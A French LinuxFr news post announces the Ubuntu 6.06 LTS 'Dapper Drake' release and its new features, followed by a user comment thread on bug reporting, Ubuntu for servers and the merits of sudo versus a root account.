Ubuntu : le canard pimpant est arrivé !

Posté par . Modéré par Jaimé Ragnagna.
0
1
juin
2006
Ubuntu
Après un long report de 6 semaines, la dernière version d'Ubuntu estampillée 6.06 LTS est enfin disponible. Son nom de code « The Dapper Drake » signifie « Le canard pimpant ».

Rappelons qu'Ubuntu - initiée par Mark Shuttleworth via son entreprise Canonical - est une distribution dérivée périodique de Debian Sid qui veut fournir depuis octobre 2004 un système libre simple et agréable à utiliser. Cette distribution a connu un certain succès dans la communauté du Libre.

Ubuntu produit une nouvelle version tous les 6 mois. Il existe des dérivées parmi lesquelles Kubuntu qui utilise KDE à la place de GNOME et Edubuntu qui cible le milieu scolaire. Enfin Xubuntu, moins officielle pour le moment, utilise l'environnement de bureau Xfce. On notera aussi la distribution NexentaOS GNU/Solaris.

Cette version mérite vraiment son titre de version majeure, symbolisé par le sigle « LTS » signifiant « support à long terme » (Long Term Support). En effet Ubuntu 6.06 sera supportée durant 3 ans pour les ordinateurs de bureau et 5 ans pour les serveurs. C'est là une autre nouveauté : Ubuntu propose désormais une version serveur et bureau distincte avec chacune un noyau optimisé et une sélection de logiciels différente. Canonical propose un support payant de $700 USD par serveur et par an.

On notera également le support tout frais des UltraSparc T1 sur les stations serveurs SunFire T1000 et T2000 et l'accord Canonical-Sun lié. Lors de la planification d'Ubuntu 6.06 LTS (alors 6.04), Ubuntu se préparait au choc face à Windows® Vista™. C'est une des motivations pour une plus grande qualité tant au niveau de l'interface que des sous bassement du système.

Développement de cette version

Le report de 6 semaines a été accordé afin de fournir un vrai support des langues asiatiques, un thème renouvelé et plus d'attention à la correction des bugs.

Le développement de cette version a été presque entièrement administré via l'outil Launchpad qui permet de gérer les spécifications, les bugs, les traductions, les équipes et les paquets de la distribution. Malgré ces fonctionnalités très pratiques, Launchpad reste un point noir de la politique de Canonical, car il n'est pas distribué et n'est pas libre. Le comble est l'apparition d'un paquet « launchpad-dependencies » qui permet d'installer tout ce dont a besoin Launchpad pour tourner, mais pas Launchpad lui-même.

Les nouveautés de l'installateur

Ubuntu propose maintenant deux manières d'installer le système : un CD d'installation en mode texte utilisant l'installateur Debian et un CD de test permettant de tester l'environnement et de l'installer graphiquement ensuite.

Les deux CD ont vu arriver une interface de démarrage conviviale pour les architectures i386 et amd64 (seulement) grâce à gfxboot. Le CD de test est plus rapide et ne pose plus de questions à l'utilisateur puisque c'est l'amorceur qui permet de tout configurer.

Le logiciel Ubiquity permet d'installer en 7 étapes le système entier. C'est la manière conseillée d'installer Ubuntu, bien qu'elle nécessite plus de puissance (plus de 256Mo de RAM et un bon processeur).

Enfin, l'installation en mode OEM a été améliorée mais manque encore de finition. Elle permet de fournir un système qui crée un compte utilisateur lors de la première utilisation.

Les fonctionnalités du système installé

Ubuntu profite des grandes améliorations de Linux 2.6.15 incluant le support de l'Airport Extreme et de bien d'autre matériel. Le noyau se décline maintenant en version desktop, server et server-bigiron.

Hotplug a été abandonné au profit de udevplug comme le font déjà Mandriva et Fedora depuis les noyaux 2.6.15. Cela apporte un gain de performance notable. Le démarrage d'Ubuntu ne dépend plus de la présence de périphériques, car les périphériques sont maintenant activés au besoin. Le système dépend des services uniquement.

Ubuntu profite des avancés de Xorg 7.0 incluant une véritable modularisation grâce aux autotools. Ainsi les mises à jour du serveur graphique n'entraînent plus le téléchargement de tous les pilotes.

Vous pouvez aisément activer le support de mDNS avec Avahi. Le partage de fichier n'a jamais été aussi facile qu'avec gnome-user-share, un partage de fichier DAV publié sur le réseau avec Bonjour/RendezVous (ZeroConf).

L'arrivée de gstreamer 0.10 a donné un support multimédia décent à Ubuntu. L'ajout de greffons non-libres a été facilité tant par la meilleure répartition en amont (plugins base, good, bad et ugly) que par l'interface d'installation de logiciel. Cela donne moins d'importance à des solutions comme EasyUbuntu.

L'installation de nouveaux logiciels n'a jamais été aussi facile sur aucun autre système ! Des centaines de logiciels sont disponibles, supportés ou communautaires, libres ou commerciaux. L'installation et la mise à jour est gérée automatiquement. L'interface d'installation est très agréable. Les Windowsiens continueront de regretter leur telechargez.com et consorts !

Avec GNOME 2.14 et ses améliorations notamment de performances, ont été aussi ajoutées des applications très sympa comme Ekiga pour la VoIP, xchat-gnome pour dialoguer sur IRC et alacarte (remplaçant smeg) pour éditer les menus. gnome-screensaver remplace avantageusement xscreensaver et gnome-power-manager apporte une véritable intégration et facilité de configuration de la gestion de l'énergie. Il est désormais aisé de suspendre son ordinateur lorsque l'écran est rabattu !

Le support des langues asiatiques par défaut grâce à l'inclusion de SCIM.

Pour les serveurs, l'installation de l'ensemble LAMP est simple. Voyant qu'Ubuntu était utilisé pour des serveurs, cette version a marqué la volonté de fournir un système adapté au serveur en appliquant le principe de simplicité qui fait la réputation d'Ubuntu.

L'interface du système installé

La couleur maîtresse est l'orange. Cela s'en ressent surtout dans le thème de démarrage, le jeu d'icône et dans le thème Gtk+. Le jeu d'icône Human a été complètement recréé par un professionnel, et utilise Tangerine puis Tango puis Hicolor pour les icônes manquantes. Ubuntu fournit trois papiers peints dont deux venant de http://art.ubuntu.com/, sélectionnés par l'équipe Art.

L'appel à un professionnel pour faire le thème (et peut-être le papier peint) est dû à un manque d'organisation de l'équipe Art qui sans meneur n'a rien su produire sauf très tard dans le cycle. De ce fait, l'apport de la communauté manquant et l'appel à un professionnel utilisant ses solutions propriétaires a conduit à un thème incomplet et incohérent. C'est pourquoi Mark Shuttleworth a déjà annoncé sur la liste de diffusion ubuntu-art qu'il y aura une mise à jour quatre ou six semaines après la sortie pour fournir un thème de qualité.

Ces problèmes donnent un coup de fouet à un équipe endormie ou dispersée qui espérons saura fournir le meilleur pour les prochaines versions d'Ubuntu. Ubuntu prévoit de fournir un ou deux thèmes complets issus de la communauté en plus du thème officiel d'Ubuntu, à l'image du choix de papier peint d'Ubuntu 6.06 LTS.

L'interface générale du bureau a été revue. Elle contient toujours l'applet poubelle si typique d'un bureau Ubuntu. Désormais l'utilisateur pourra accéder à une nouvelle boîte de dialogue de clôture de session grâce à un bouton situé dans le coin supérieur droit, à l'image du bouton de fermeture d'une fenêtre.

Le menu d'aide et la documentation ont été l'objet de grandes améliorations. Le support communautaire est mis en avant, et ce même sur la page par défaut désormais traduite du navigateur Internet.

L'avenir

Comme d'habitude, Mark Shuttleworth nous a fait rêvé dans un courriel annonçant le nom de la prochaine version d'Ubuntu : « The Edgy Eft » c'est-à-dire « Le triton énervé ». L'idée de cette version est que, ayant une version stable et supportée, Ubuntu peut laisser libre court à l'expérimentation et l'inclusion de technologie révolutionnaires. Il cite notamment l'affichage composée du bureau avec AIGLX (intégré dans Xorg 7.1) ou Xgl, avec compiz ; ou encore la virtualisation avec Xen, l'utilisation de NetworkManager, de Smart pour gérer les paquets de logiciels, etc.

Bref, de belles promesses qui espérons-le, motiveront de nombreux nouveaux contributeurs au libre, depuis Linux jusqu'à GNOME et bien sur Debian.
  • # avant toutes choses

    Posté par . Évalué à -10.

    je voudrais remercier ploum d'avoir développé une aussi belle distribution.
    • [^] # Re: avant toutes choses

      Posté par (page perso) . Évalué à -7.

      Juste un coup de gueule pour commencer :-) :
      je trouve pleins de bugs dans la nouvelle version d'ubuntu. Savoir où déclarer les bugs de façon efficace étant compliqué, je n'ai pas eu le temps de le faire depuis 2 semaines que je l'ai installé.
      Des bugs liés à gnome et d'autres à ubuntu voire au deux. Donc pour le moment, je ne peux pas la conseiller à des débutants tant que je n'aurais pas compris comment résoudre certains problèmes de configuration par défaut.
      Sinon, c'est intéressant de voir la communauté autour, manquerait plus qu'elle s'intéresse à tester d'avantage la distribution avant sa sortie. Moi j'y arrive juste donc on verra avec le temps si je m'implique ou pas dans la distribution.
      Donc il faudrait se bouger le c*l un peu pour aider à améliorer les choses qui ne vont pas !!
      Bon courage à ubuntu !

      Christophe

      • [^] # Re: avant toutes choses

        Posté par (page perso) . Évalué à -10.

        Moi j'aurais préféré The Dapper Driva.
      • [^] # Re: avant toutes choses

        Posté par (page perso) . Évalué à 6.

        https://launchpad.net/distros/ubuntu/+filebug

        C'est gentil de dire, le jour de la release, que t'as des bugs depuis deux semaines et qu'il faut qu'on se bouge vraiment le cul. C'est une bonne idée, on y avait pas pensé en fait.
        • [^] # Re: avant toutes choses

          Posté par (page perso) . Évalué à -4.

          J'ai bien dit "de façon efficace". Y a des bugs liés à gnome et la questio, est-ce que je les mets dans le louchpad ou dans gnome directement pour que ça remonte plus rapidement ?
          C'est la question que je me pose et je n'ai pas eu le temps même en deux semaines, je découvre encore comment est organisée la communauté autour de la distrib.

          Christophe

          • [^] # Re: avant toutes choses

            Posté par (page perso) . Évalué à 6.

            De maniere efficace, mets les dans launchpad, dans le bon package. Fais ca systématiquement : tu ne sais pas si ton bug interessera les développeurs du soft, ou si ils pourront le corriger rapidement, mais dans tous les cas il peut interesser ubuntu (qui peut vouloir avoir un hack spécifique qui serait rejeté en amont, par exemple).

            Certains developpeurs suivent directement dans launchpad les bugs qui les interessent, mais de toutes manieres sinon le(s) mainteneur(s) coté ubuntu font remonter les bugs si ils estiment que le probleme se situe en amont et non coté ubuntu.

            Si tu es certain que le probleme est pas spécifique à ubuntu, tu peux créer un rapport de bug dans le bug tracker correspondant *et* dans launchpad: tu pourras ensuite surveiller le premier dans le bug coté launchpad (Regarde le lien "Link to Other Bug Tracker").
          • [^] # Re: avant toutes choses

            Posté par (page perso) . Évalué à -1.

            En général tu fais un bug report au développeur et ensuite tu signales ce bug report à la distribution... Je vois pas ce qu'il y'a de particulier à Ubuntu la dedans...
        • [^] # Re: avant toutes choses

          Posté par . Évalué à -7.

          https://launchpad.net/distros/ubuntu/+filebug

          C'est gentil de dire, le jour de la release, que t'as des bugs depuis deux semaines et qu'il faut qu'on se bouge vraiment le cul. C'est une bonne idée, on y avait pas pensé en fait.


          Je n'utilise pas d'outil non-libre pour corriger du libre.
          • [^] # Re: avant toutes choses

            Posté par (page perso) . Évalué à 6.

            erf...j'vais pas capté que t'étais pas ploum mais Optik.
            Sinon tu utilise Google ? Parceque c'est pareil. Google a une infrastructure logicielle a eux et ils ne la fournisse a personne. Ils fournisse juste un service web basé sur cette infrastructure. Il n'ont donc aucune obligation de donner les sources...pas plus qu'ubuntu qui a Launchpad pour lamême chose : infrastructure a eux pour mettre un service web à disposition. C'est exactement le cas d'une entreprise qui utilise un soft a eux en interne sans le mettre a disposition : c'est parfaitement légitime même aux yeux sourcilleux de RMS.

            PS : Je suis d'accord avec le fait que c'est contre l'esprit du libre qui favorise l'entraide et l'échange. Ubuntu a annoncé qu'ils ouvriraient launchpad un peu plus tard donc wait and see.
      • [^] # Re: avant toutes choses

        Posté par . Évalué à 2.

        On ne dit pas "il faudrait que le canard pimpant se bouge le cul", on dit "il faudrait que le canard pimpant se secoue le bas des reins", et en plus, en musique !!!
  • # Sainul !

    Posté par (page perso) . Évalué à -5.

    Ben oui, y'a pas de lien vers les screenshots.

    /o/ ===> []
    • [^] # Re: Sainul !

      Posté par . Évalué à 1.

      J'arrivais pas à mettre plus de lien :)
      • [^] # Re: Sainul !

        Posté par . Évalué à -1.

        Les commentaires sont la pour ça ;-)

        Et en évitant de mettre 2 annonces pour la même chose en lien ca t'aurait fait gagné un lien pour pouvoir mettre des screenshots. Eb supprimant le lien de commande gratuite qui n'a rien a faire ici, ca t'aurait fait un lien de plus.

        Bref, fallait mieux gérer tes liens :-)
  • # Plouf !

    Posté par . Évalué à -10.

    Je n'ai rien à dire de plus, la nouvelle se suffit à elle-même. Évidemment nous attendons avec impatience la confirmation et les réactions de ploum. Where is ploum ?

    « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

    • [^] # Re: Plouf !

      Posté par . Évalué à -10.

      son commentaire arrive, mais écrire sur le clavier minuscule d'un nokia 45687241i c'est pas facile...
    • [^] # Re: Plouf !

      Posté par . Évalué à -10.

      DTC ?

      bon ok, je => []

      A vos moinssage :-)
  • # Ubuntu sur un serveur

    Posté par (page perso) . Évalué à 5.

    N'étant pas utilisateur d'Ubuntu, je ne troll pas mais cherche plutôt quelques informations, question d'être un peu plus au courant des choses...

    L'idée que je me faisais d'Ubuntu était celle d'une distribution se voulant "user-friendly", donc visant plutôt des utilisateurs simples ne voulant pas se lancer dans de grandes aventures, tout en donnant à GNU/Linux sa chance. Qui plus est, on propose les toutes dernières nouveautés, tout en donnant une grande importance à l'apparence.

    Les quelques contacts rapides que j'ai eu avec la distribution n'ont fait que renforcer ce point de vue (installation très facile ne demandant presque aucune intervention mais ne semblant pas laisser une marge suffisante à toute personne voulant bidouiller un peu le tout ; compte root désactivé par défaut, ce que je trouve assez pénible en fait, mais je comprend l'initiative ; etc.).

    Ce qui m'a donc surpris en lisant cette nouvelle, c'est d'apprendre qu'il existe une version serveur d'Ubuntu. Après lecture, j'en déduis que c'est plus ou moins la même que la version normale, l'offre des logiciels étant plutôt adaptée à des tâches de serveurs bien évidemment (ainsi que le noyau). Ceci dit, les versions restent les même. Nous retrouvons donc le noyau 2.6.15, le dernier Xorg, etc. Mais cette démarche, ne pose-t'elle pas un problème de sécurité ? Je m'étais fait à l'idée que quand on parle de serveur, il faut un minimum de temps pour vérifier l'intégrité et la stabilité des logiciels que l'on compte fournir. 6 mois sont suffisant pour s'assurer que le tout peut en effet être utiliser pour un serveur ?

    Je vous l'accorde le modèle debian est peut-être un peu trop parano, une nouvelle version tous les 2 ans (ou plus ?) est un peu lent, mais d'un autre côté le système a au moins fait ses preuves...

    Je ne cherche pas à lancer un quelconque débat debian/ubuntu. Ce que je veux savoir, c'est s'il est légitime pour un administrateur de se tourner vers une Ubuntu pour un de ses serveurs ?
    • [^] # Re: Ubuntu sur un serveur

      Posté par (page perso) . Évalué à 7.

      Tout dépend du besoin de ton serveur.

      Personnellement, mes serveurs sont sous Debian. C'est un gage de stabilité, de sécurité, toussa...

      Cependant, si tu fais des choses un feu fancy sur ton serveur et que tu te retrouves à vouloir installer RoR ou Django depuis le svn, ben Debian n'est peut-être pas approprié.

      Dans ce cas de figure, je pense que Ubuntu serait une bonne idée. Le support de 6.06 sur les serveurs est de plus de 5 ans, ce qui est un avantage non négligeable.

      Ça dépend donc de l'usage que tu as de ton serveur je pense.


      PS : sinon je comprend pas tous ces gens qui se plaignent de la désactivation de root. ça s'active avec un simple "sudo passwd" ou, sans le réactiver, on obtient un shell avec un bête "sudo -s". C'est même plus facile que de devoir entrer un second mot de passe à l'install et le retenir...
      • [^] # Re: Ubuntu sur un serveur

        Posté par . Évalué à -5.

        Si l'admin ne sait pas installer manuellement et proprement un soft mieux vaut changer d'admin, enfin, moi c'est comme ca que je le vois.

        L'intégration avec la distrib n'est sans doute pas super, mais si l'admin est compétent un logiciel installé manuellement ne restera pas avec une faille de sécu très longtemps.

        mes 2 ¢
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 9.

          Je ne suis pas d'accord. L'admin a peut etre autre chose de mieux à faire que de maintenir des softs installés à la main (on parle bien de tarballs) en appliquant des patchs.

          De plus si cet admin est responsable d'un grand nombre de serveurs... Vive la perte de temps.

          Autant faire confiance à une équipe de sécurité qui s'engage (parfois commercialement) à corriger les failles de sécus, en se reposant sur le système éprouvé de paquaging. C'est plus pragmatique. Quand tu pars en vacances il se peut qu'il y ait tout de même des alertes de sécurités ;)

          Sinon de manière globale, l'intéret de Ubuntu serveur réside aussi dans les certifications par rapports à de gros produits de l'industrie (DB2, Mysql..). Certains partenariats sont en cours pour permettre une exploitation plus aisée de ces serveur (JVM Sun intégrée, installeur Oracle éventuel...)

          Pour résumé l'intéret de Ubuntu serveur pour un décideur en trois points:
          - Support sécurité de 5 ans
          - Bonne offre de maintenance ( voir Ubuntu Market place)
          - Certifications industrielles (en cours et à venir)
          • [^] # Re: Ubuntu sur un serveur

            Posté par (page perso) . Évalué à 1.

            Pour résumé l'intéret de Ubuntu serveur pour un décideur en trois points:
            - Support sécurité de 5 ans
            - Bonne offre de maintenance ( voir Ubuntu Market place)
            - Certifications industrielles (en cours et à venir)


            En clair, ce n'est pas Debian qui est visée mais plutôt RedHat et son monopole.
        • [^] # Re: Ubuntu sur un serveur

          Posté par (page perso) . Évalué à 9.

          euh, tu es admin là ?

          Parce que c'est comme si un pilote de ligne se plaignait de l'existence du pilote automatique.

          Personnellement, les serveurs que j'administre n'ont aucun outil de dev (pas de compilo, rien).
          Et je refuse d'installer des logiciels autrement qu'en paquet deb

          Exception : les passerelles Jabber de fritalk. J'ai écrit un script assez conséquent pour devoir les gérer et, franchement, j'aurais préféré avoir un simple deb pour chacune.

          enfin, tout le monde n'a pas tes supers pouvoirs d'admin de se rappeller exactement de tous les logiciels qu'on a installé et de suivre les RSS de chacun pour pouvoir patcher à la moindre faille.

          Debian fait le boulot à ma place pour ça, ils sont vachement plus doués que moi, autant qu'ils le fassent ;-)
          • [^] # Re: Ubuntu sur un serveur

            Posté par . Évalué à -10.

            Un admin sait ou chercher les infos sur la sécurité, et il existe des liste de diffusions ou flux RSS ressençant toutes les alertes parues dans le dictionnaire du MITRE. Si tu les connais pas il serait temps de les chercher.

            • [^] # Re: Ubuntu sur un serveur

              Posté par . Évalué à 0.

              C'est dans le dictionnaire du MITRE qu'on trouve la définition du verbe ressençer ? :D
      • [^] # Re: Ubuntu sur un serveur

        Posté par . Évalué à -2.

        PS : sinon je comprend pas tous ces gens qui se plaignent de la désactivation de root. ça s'active avec un simple "sudo passwd" ou, sans le réactiver, on obtient un shell avec un bête "sudo -s". C'est même plus facile que de devoir entrer un second mot de passe à l'install et le retenir...

        C'est encore plus facile de travailler tout le temps sous root, au moins plus besoin de devoir saisir le mot de passe à chaque action : après tout, c'est ton système, il n'y a pas de raison qu'on t'empêche de l'utiliser en toute liberté ! Hein ? Quoi ? La sortie ? Ok, je sors ...

        « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

      • [^] # Re: Ubuntu sur un serveur

        Posté par (page perso) . Évalué à 0.

        Ok merci, c'est le genre de réponse à laquelle je m'attendais...

        Pour ce qui est de la désactivation du root, n'étant pas un connaisseur d'Ubuntu, j'ai installé, j'ai tappé "su" puis je me suis retrouvé tout bête sans mot de passe :). Il m' a fallu donc 5 mn d'internet (heureusement un autre pc était à côté) pour trouver la réponse. Mais disons que moi je suis plutôt dans la catégorie d'utilisateurs qui aiment bien avoir un contrôle complet de ce qui se passe sur la machine. C'est personnel, pas une critique de la distribution. Celle-ci s'adresse en grande partie à des utilisateurs qui n'auront pas besoin du compte root et qui risqueraient de faire plus de mal que de bien s'ils y avaient accès.

        Sinon l'histoire du "sudo -s" pour le shell..... On obtient un shell en tant que root juste avec cette commande ? N'est-ce pas un peu risqué ?
        • [^] # Re: Ubuntu sur un serveur

          Posté par (page perso) . Évalué à -2.

          ben ce n'est pas plus risqué que via un "su" tout simple. (avec sudo -s, tu dois rentrer quand même un mot de passe, comme su, sauf que c'est le tien pas celui de root)

          Bien sûr, par défaut, seul l'utilisateur qui a installé la machine possède ces droits là. On fait la supposition que le premier compte créé est de toutes façons l'utilisateur qui aura besoin de root.

          Je pense que c'est une supposition tout à fait justifiée.
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 1.

          Minute...

          On obtient un shell root si tu tapes ton mot de passe ET que tu fait partir du groupe administrateur.

          Au niveau sécu cela se tient.
          • [^] # Re: Ubuntu sur un serveur

            Posté par . Évalué à -2.

            Et si quelqu'un passe sur ta machine moins de 15 min apres que tu ais entrer ton mot de passe, il fait sudo -s et il obtiens un shell root sans mot de passe... question sécurité ça se tient beaucoup moins
            • [^] # Re: Ubuntu sur un serveur

              Posté par (page perso) . Évalué à 1.

              echo "sudo -K">>~/.bash_logout

              Si t'as un besoin, y'a toujours une solution sous Unix ;)
            • [^] # Re: Ubuntu sur un serveur

              Posté par . Évalué à 0.

              euhh...C'est pareil si tu as un shell sous root qui est ouvert.

              L'important est de locker sa session dès que tu n'es plus devant l'écran. C'est un automatisme.
              • [^] # Re: Ubuntu sur un serveur

                Posté par (page perso) . Évalué à 0.

                Oui, mais le coup du timeout dans sudo, c'est bien pire que ça.

                Si un mec exploite une faille de sécurité dans mon firefox et que j'ai fait un sudo moins de 15 minutes avant, paf, il est root sur ma machine.

                Mais bon, des failles dans firefox, y'en a jamais, hein ;-).
                • [^] # Re: Ubuntu sur un serveur

                  Posté par . Évalué à 0.

                  le mec en question pourrait tout aussi bien executer un keylogger...

                  Y'a pas de système parfait. les failles faut les corriger.

                  Après rien ne t'oblige à utiliser le compte qui a les droits sudo pour naviguer. Tu peux très bien utiliser un autre compte et te logger sur ce compte "admin" si tu veux executer des tâches administratives...
                  • [^] # Re: Ubuntu sur un serveur

                    Posté par . Évalué à -2.

                    Ce compte admin, on l'appelle le compte root...
                    • [^] # Re: Ubuntu sur un serveur

                      Posté par . Évalué à 0.

                      sauf que quand tu es logué dessus, tu peux tester une commande et la valider après avec sudo pour être sûr de l'avoir bien tapé et de pas effacer tout ton disque dur...
                • [^] # Re: Ubuntu sur un serveur

                  Posté par (page perso) . Évalué à 1.

                  Au moins chez moi, la config par défaut de sudo a la variable "tty_tickets" a 1, donc si firefox a une faille de sécu, bah ca changera pas grand chose: ton authentification via sudo n'étant valable que pour le terminal dans lequel tu as utilisé sudo.
                  • [^] # Re: Ubuntu sur un serveur

                    Posté par (page perso) . Évalué à 0.

                    Ca empèche pas firefox de ptrace()r le term pour lui faire exécuter ce qu'il veut.

                    pertinent adj. Approprié : qui se rapporte exactement à ce dont il est question.

                    • [^] # Re: Ubuntu sur un serveur

                      Posté par (page perso) . Évalué à 0.

                      Et la ca commence à faire beaucoup hein... Il faut trouver le bon term, et de toutes facons, si un attaquant commence à faire ca... Tu as d'autres problemes sur les bras (avec par exemple ce qui est dit plus haut, installation de keylogguers et compagnie).

                      Si t'es vraiment parano, rien ne t'oblige à utiliser sudo sous ubuntu...
                      • [^] # Re: Ubuntu sur un serveur

                        Posté par . Évalué à 1.

                        Si t'es vraiment parano, rien ne t'oblige à utiliser sudo sous ubuntu...

                        Le public ciblé par Ubuntu n'est peut-être pas capable de désactiver sudo, sans pour autant incapable de retenir 2 mots de passe distincts utilisateur et administrateur.
                        • [^] # Re: Ubuntu sur un serveur

                          Posté par (page perso) . Évalué à 1.

                          Il existe pas mal de sites qui expliquent tres simplement comment activer le compte root et l'utiliser. Et il ne s'agit pas d'etre capable ou pas, c'est avant tout une question pratique, simplicité d'utilisation, tout ca.

                          Maintenant, je serais très content si Ubuntu (et MacOSX tiens, qui utilise aussi sudo) fournissait une interface simple pour bidouiller des trucs autour de sudo, comme par exemple changer le timeout par défaut, activer le password root sans passer par une installation expert ou sans aller trifouiller les comptes utilisateur, et switcher automatiquement tous les appels a gksu (utilisé dans le menu System > Administration de gnome) de sudo vers su.
                        • [^] # Re: Ubuntu sur un serveur

                          Posté par . Évalué à 2.

                          le public ciblé qui est dans ce cas la sera de toute façon incapable de prendre de bonnes habitudes concernant la sécurité. Donc c'est plus un problème.

                          Le seul moyen de sécuriser sa machine, c'est de savoir comment elle fonctionne.
                      • [^] # Re: Ubuntu sur un serveur

                        Posté par (page perso) . Évalué à 0.

                        Ba si l'attaquant en est à prendre sudo en compte, je vois pas pourquoi il passerait pas un peu de temps en plus pour prendre en compte tty_tickets.

                        pertinent adj. Approprié : qui se rapporte exactement à ce dont il est question.

            • [^] # Re: Ubuntu sur un serveur

              Posté par (page perso) . Évalué à -2.

              Non parce que tu es un gentil admin qui sait ce qu'il fait et que donc, de la meme maniére que tu ne laisse pas ta machine avec une console en root ouverte, tu ne laisse pas ta machine avec une console qui risque de poser problémes ouverte.

              Non sans blague ces débats stérile sur su/sudo se sont déroulé des centaines de fois voir des milliers pour en arriver toujours au meme point, chacun campe sur ses positions :
              - l'admin pointilleux qui nous sort un argument boiteux prouvant mathématiquement que sudo est dangereux
              - l'utilisateur maniaque qui démontre que dans chaque situation il a un clic de moins a faire par rapport a un vrai root

              Vous aimez pas? grand bien vous fasse! :) on est quelques un a aimé et on oblige personne a le faire!
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 0.

          Sinon l'histoire du "sudo -s" pour le shell..... On obtient un shell en tant que root juste avec cette commande ? N'est-ce pas un peu risqué ?

          Pas plus que "sudo bash" ;-)

          De toute façon il te demande ton mot de passe avant (le tient, pas celui de root, c'est le principe de sudo), avec la possibilité (activé par défaut sur Ubuntu) de ne pas te le redemander si tu l'as déjà donné il y a moins de 5min.
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 1.

          si le comportement pas défaut de l'installateur de Ubuntu ne convient pas, il suffit de faire une installation en mode expert ! Plus d'étapes, plus de contrôle, ... et un compte root normal.
      • [^] # Re: Ubuntu sur un serveur

        Posté par (page perso) . Évalué à 1.

        J'ai un contre-exemple :
        phpmyadmin est une applications php qui a souvent des failles de sécurité et qui pourtant n'est jamais patché sous debian ou alors il faut attendre très très longtemps donc dire que c'est un gage de sécurité, il faut faire attention.
        Je dirais que le problème est le même partout, si personne ne se propose de faire le patch, ça ne se corrige pas tout seul et visiblement, y a un problème de ressources humaines.
        J'avais déclaré des bugs sur l'installeur debian, ils n'ont jamais été corrigés et ont même été effacés. Je m'étais inscrit sur la mailing liste debian-boot qqchose et quand j'ai vu les développeurs dire quelque chose du style "à quoi bon stabiliser l"installeur, tout le monde a déjà installé la testing", je me suis dit que fallait pas compter sur eux pour corriger.
        Peu importe la distribution, il faut surveiller les alertes sécurité et vérifier que les patchs arrivent sinon... ça dépend si on a le temps ou pas de tenter d'envoyer un patch à quelqu'un (quand on sait comment faire) ou bien on patche pour soi.

        Christophe

        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 3.

          juste pour dire que la version Debian de phpmyadmin n'est pas la même que la version officielle. c'est adapté au reste fourni par Debian (Apache, PHP, mysql évidement), trifouillé, etc...

          donc si Debian enlève une fonctionnalité pour une raison ou une autre et que c'est cette fonctionnalité qui s'avère plombée, il n'y a pas lieu de patcher quoi que ce soit.
          • [^] # Re: Ubuntu sur un serveur

            Posté par (page perso) . Évalué à 2.

            Elle est modifiée mais n'est jamais patchée. Je ne vois pas en quoi cette version là n'est jamais concernée par les trous de sécurités. Les gens de chez debian sont des génis et ont vu tous les trous et les ont enlever avant la sortie de la dernière debian ce qui serait quand même très fort.

            Christophe

            • [^] # Re: Ubuntu sur un serveur

              Posté par . Évalué à -2.

              Il serait peut-etre bon, de regarder le changelog et le BTS pour voir si ces failles n'ont pas déjà été corrigées pendant la phase de test qui s'appelle « unstable » ;-)
        • [^] # Re: Ubuntu sur un serveur

          Posté par (page perso) . Évalué à 2.

          Hum, j'aimerais bien en savoir plus sur ton histoire de bug sur l'installateur, parceque ça me paraît un peu gros. Il faut savoir que le BTS est vraiment un élément central de Debian, et qu'il très rare de fermer un bug si il n'est pas corrigé. De plus, tu n'as pas à te soucier de t'inscrire à des listes de diffusion particulières, puisqu'en temps que rapporteur du bug, toutes les interventions sur ce bug te seront rapportées. Donc à part si ton bug était un bug vraiment peu important (whislist, par exemple), ou impossible à reproduire, je ne vois pas pourquoi il aurait été fermé "sans raison apparente".
          • [^] # Re: Ubuntu sur un serveur

            Posté par (page perso) . Évalué à 1.

            Tu n'as pas connu Christian Marillat, toi...
            Oui, c'est rare mais ça existe et on ne parle pas du syndrôme "on est tous sur unstable, à quoi bon ...".
          • [^] # Re: Ubuntu sur un serveur

            Posté par . Évalué à 6.

            Concernant l'attitude comparée de Debian et Ubuntu concernant la correction de bug, j'ai eu une mauvaise expérience avec Debian...
            Il s'agissait d'un problème avec udev et les périphériaues Firewire, donc plutôt orienté deskop.

            J'étais sous Debian depuis 5 ans sur tous mes PC, et je n'envisageait pas de changer.

            Mais j'avais un problème avec ces prériphériques. J'ai cherché sur Google la cause et même trouvé un contournement (une règle à rajouter dans udev). J'ai ouvert un bug sur Debian, proposé le coutournement.

            Réponse mainteneur : " le problème ne vient pas de mon paquet (udev), le problème sera corrigé qaund les drivers Firewire seront adaptés à udev. Le contournement n'est pas beau, je n'en veux pas dans mon paquet. Si vous n'êtes pas contents, installez vous-même la règle, ou mieux allez sous Ubuntu, moi je suis développeur et bénévole, vous n'êtes que des utilisateurs."

            En effet, sous Ubuntu, le contournement était installé par défaut. Peut-être pas "beau", mais fonctionnel.

            Je pense que l'hubris de certains mainteneurs Debian leur a fait oublier le point 4 du Contrat Social Debian : Our priorities are our users and free software .

            Très dommage. Ce souci de l'utilisateur, je le retrouve maintenant sur Ubuntu. Mais serveurs sont aujourd'hui toujours sous Debian, mais franchement, la solution Ubuntu pourrait m'intéresser.
            • [^] # Re: Ubuntu sur un serveur

              Posté par . Évalué à -1.

              enfin heureusement il n'y a qu'un seul Marco d'Itri (responsable de udev) .. Heureusement, son attitude n'est pas représentative.

              Sinon je n'ai pas retrouvé le bogue en question dans le BTS, tu as le n° ?
              • [^] # Re: Ubuntu sur un serveur

                Posté par . Évalué à 0.

                Non, je n'ai plus le numéro (c'était il y a environ 18 mois) et je ne retrouve pas non plus le bug dans le BTS. Je crois qu'en réalité il était peut-être sous hotplug, mais c'est le même mainteneur.

                Néanmoins relire les échanges sur d'autres bugs donne une idée de l'état d'esprit et du ton qu'il utilise !
                Je suppose qu'il est par ailleurs compétent et il semble en effet y passer pas mal de temps. Au final, hotplug marche plutôt bien sous Debian... Merci à lui malgré tout !

                Par contre sur une machine de bureau ou un portable et pour un utilisateur qui n'a pas envie de passer des heures à rendre son système pleinement fonctionnel, je conseille plutôt Ubuntu. (le risque étant comme toujours que si ça marche, on n'ait pas besoin de comprendre comment ça marche...)
      • [^] # Re: Ubuntu sur un serveur

        Posté par (page perso) . Évalué à 3.

